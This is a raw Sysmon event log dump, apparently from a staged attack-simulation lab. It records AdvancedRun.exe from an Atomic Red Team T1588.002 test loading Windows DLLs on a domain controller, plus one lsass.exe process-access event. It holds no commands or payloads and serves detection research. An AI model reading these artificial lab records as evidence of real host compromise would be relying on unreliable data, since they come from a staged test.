Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982991Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982990Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982989Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003982988Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003982987Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982986Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982985Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982984Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982983Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982982Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982981Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982980Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982979Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982978Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982977Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982976Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982975Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982974Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982972Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982971Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982970Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982969Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982968Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982967Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982966Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982965Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982964Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982963Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982962Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982961Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982959Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982957Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982956Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982955Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.647{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982954Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982953Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982952Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982951Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982950Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982949Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982948Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982947Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982946Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.631{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982945Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 